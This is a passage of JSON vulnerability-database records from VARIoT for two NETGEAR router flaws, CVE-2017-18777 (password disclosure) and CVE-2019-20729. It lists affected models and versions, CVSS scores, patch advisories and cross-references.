"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1341",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.60"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.29"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.28"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.36"
},
{
"model": "dgn2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.40"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.28"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.60"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.29"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "dgn2200v4",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.0.82"
},
{
"model": "dgn2200bv4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.40"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31323"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014916"
},
{
"db": "NVD",
"id": "CVE-2017-18777"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200b_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014916"
}
]
},
"cve": "CVE-2017-18777",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2017-18777",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 2.1,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014916",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2020-31323",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2017-18777",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.5,
"id": "CVE-2017-18777",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014916",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18777",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18777",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2017-014916",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-31323",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1881",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31323"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014916"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1881"
},
{
"db": "NVD",
"id": "CVE-2017-18777"
},
{
"db": "NVD",
"id": "CVE-2017-18777"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by administrative password disclosure. This affects D6220 before V1.0.0.28, D6400 before V1.0.0.60, D8500 before V1.0.3.29, DGN2200v4 before 1.0.0.82, DGN2200Bv4 before 1.0.0.82, R6300v2 before 1.0.4.8, R6400 before 1.0.1.20, R6700 before 1.0.1.20, R6900 before 1.0.1.20, R7000 before 1.0.7.10, R7100LG before V1.0.0.32, R7300DST before 1.0.0.52, R7900 before 1.0.1.16, R8000 before 1.0.3.36, R8300 before 1.0.2.94, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.12, and WNR3500Lv2 before 1.2.0.40. plural NETGEAR Devices contain vulnerabilities in insufficient protection of credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR WNR3500L, etc. are all products of NETGEAR. WNR3500L is a wireless router. NETGEAR R6700 is a wireless router. NETGEAR D6220 is a wireless modem",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18777"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014916"
},
{
"db": "CNVD",
"id": "CNVD-2020-31323"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18777",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014916",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-31323",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1881",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31323"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014916"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1881"
},
{
"db": "NVD",
"id": "CVE-2017-18777"
}
]
},
"id": "VAR-202004-1341",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31323"
}
],
"trust": 1.134857285263158
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31323"
}
]
},
"last_update_date": "2024-11-23T23:01:24.503000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Administrative Password Disclosure on Some Routers and Gateways, PSV-2017-0385",
"trust": 0.8,
"url": "https://kb.netgear.com/000049551/Security-Advisory-for-Administrative-Password-Disclosure-on-Some-Routers-and-Gateways-PSV-2017-0385"
},
{
"title": "Patch for Multiple NETGEAR product information disclosure vulnerabilities (CNVD-2020-31323)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/220055"
},
{
"title": "Multiple NETGEAR Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116657"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31323"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014916"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1881"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-522",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014916"
},
{
"db": "NVD",
"id": "CVE-2017-18777"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18777"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000049551/security-advisory-for-administrative-password-disclosure-on-some-routers-and-gateways-psv-2017-0385"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18777"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31323"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014916"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1881"
},
{
"db": "NVD",
"id": "CVE-2017-18777"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-31323"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014916"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1881"
},
{
"db": "NVD",
"id": "CVE-2017-18777"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-31323"
},
{
"date": "2020-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014916"
},
{
"date": "2020-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1881"
},
{
"date": "2020-04-22T15:15:12.097000",
"db": "NVD",
"id": "CVE-2017-18777"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-31323"
},
{
"date": "2020-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014916"
},
{
"date": "2020-04-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1881"
},
{
"date": "2024-11-21T03:20:53.580000",
"db": "NVD",
"id": "CVE-2017-18777"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1881"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Inadequate protection of credentials on devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014916"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1881"
}
],
"trust": 0.6
}
}
var-202004-0801
Vulnerability from variot
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects JNDR3000 before 1.0.0.22, R6250 before 1.0.4.26, R6300v2 before 1.0.4.22, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R7000 before 1.0.9.28, R6900P before 1.3.1.26, R7000P before 1.3.1.26, R7300DST before 1.0.0.62, R7900 before 1.0.2.16, R8000 before 1.0.4.18, R7900P before 1.4.1.42, R8000P before 1.4.1.42, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WNDR3400v3 before 1.0.1.18, WNDR4500v2 before 1.0.0.68, and WNR3500Lv2 before 1.2.0.48. plural NETGEAR The device contains an input verification vulnerability.Information may be tampered with
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0801",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "jndr3000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "wndr4500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.16"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.48"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.26"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.1.42"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.1.26"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.116"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.9.28"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.22"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.1.42"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.116"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.1.26"
},
{
"model": "jndr3000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.26"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.22"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.3.1.26"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.9.28"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.3.1.26"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015388"
},
{
"db": "NVD",
"id": "CVE-2019-20729"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:jndr3000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000p_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015388"
}
]
},
"cve": "CVE-2019-20729",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2019-20729",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 2.1,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2019-015388",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 0.8,
"id": "CVE-2019-20729",
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "cve@mitre.org",
"availabilityImpact": "LOW",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.5,
"id": "CVE-2019-20729",
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.4,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2019-015388",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
